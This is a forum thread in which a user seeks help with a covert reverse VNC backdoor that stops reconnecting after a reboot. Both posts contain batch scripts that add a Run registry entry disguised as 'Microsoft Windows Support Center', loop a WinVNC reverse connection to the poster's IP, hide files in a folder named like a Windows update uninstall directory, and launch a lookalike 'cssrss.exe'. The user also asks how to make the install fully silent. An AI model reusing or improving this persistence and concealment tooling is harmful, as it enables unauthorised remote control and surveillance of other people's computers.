Jump to content

Reverse VNC autostart problem


pjsallday

Recommended Posts

I am having trouble getting the reverse vnc to stay alive after a computer restart.  I followed these instructions:

Adds a startup process which connect to your machine:

@echo off

reg. exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "Microsoft Windows Support Center" /t REG_SZ /d "your. path. of. coicereverse. exe"

This is the reverse. exe:

@echo on

". nircmd. exe" wait 40000

:loop

". vnc. exe" -connect your. static. hostname::5500

". nircmd. exe" wait 90000

goto loop

and this is from my go. bat

@echo off

reg. exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "Microsoft Windows Support Center" /t REG_SZ /d "C:WINDOWSreverse. exe"

@echo on

". nircmd. exe" wait 40000

:loop

". WinVnc. exe" -connect 68. xxx. xxx. xxx::5500

". nircmd. exe" wait 90000

goto loop

I am kinda lost here because after a restart it will not connect to me.  I have even tried to just paste all the vnc files in the windows directory and create and executable out of the second half and call it reverse. exe.  It works ok if just run that . exe but if I restart it takes 100% of the CPU and does not connect.  Just wondering if you guys had any suggestions.  I am sure this is something stupid I am missing.  Thanks for your time.

Link to comment
Share on other sites

@echo off

"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 40000

:loop

"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVnc.exe" -connect xxx.xxx.xxx.xxx::5500

"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 90000

goto loop

this is what I made the reverse.exe out of. the this is in go.bat

echo off

if not exist WIPdump md WIPdump >nul

if not exist WIPdump%computername% md WIPdump%computername% >nul

cd WIPCMD >nul

echo off

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn"

cd WIPVNCInstallFiles

start cssrss.exe

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn"

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h

copy reverse.exe %systemroot%

start %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$services.bat

regedit /s WIPCMDvncdmp.reg

regedit /s WIPCMDvncdmp1.reg

regedit /s WIPCMDvncdmp2.reg

regedit /s WIPCMDVNC.reg

ping -n 3 localhost  > nul

net start WinVNC

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

I have one more problem though. When this installs it is not completely silent. I use a vbs script to launch the go.bat and there is a black window that pops up for a split second. I was wondering if there is a way to get rid of that.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...